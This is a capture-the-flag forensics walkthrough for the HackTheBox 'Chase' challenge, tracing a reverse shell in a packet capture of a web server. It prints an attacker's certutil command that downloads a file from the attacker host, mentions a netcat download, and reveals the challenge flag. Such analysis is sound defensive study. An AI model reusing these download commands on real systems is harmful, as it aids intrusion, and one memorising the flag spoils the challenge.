One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We've taken a network capture before shutting the server down to take a clone of the disk. Can you take a look at the PCAP and see if anything is up?
Information
Challenge: Chase
Category: Forensics
Difficulty: Easy
Files : Chase.zip 54 KB
– chase.pcapng 124 KB
Environment: Remnux VM
My Recommendations
Download it from hackthebox and verify it with:
sha256sum /path/to/Chase.zipSHA256SUM: 8bb062cb6ba2cbf8240cc975096980ac99a1db3d30fe70db6c11e71956d7e3eb
Walkthrough
1. Traffic Analysis
Let’s check Wireshark’s Export Objects > HTTP:
After packet 37, IP address 22.22.22.7 starts communicating. We can save all the objects, and rename name according to packet number (since there’s duplicates of almost every file).
2. File Analysis
The file from packet 23, is an octet-stream:
It is basically a reverse shell, which communicates HTLM format. In Packet 37, the command to download net cat is invoked. Honestly, afterwards not much of high interest happens. Except the last command, which is
certutil -urlcache -split -f http://22.22.22.7/JBKEE62NIFXF6ODMOUZV6NZTMFGV6URQMNMH2IBA.txt c:\users\public\
The contents of these files are literal nonsense… but the filename… is base32 encoded . It decodes to: HTB{MAn_8lu3_73aM_R0cX}
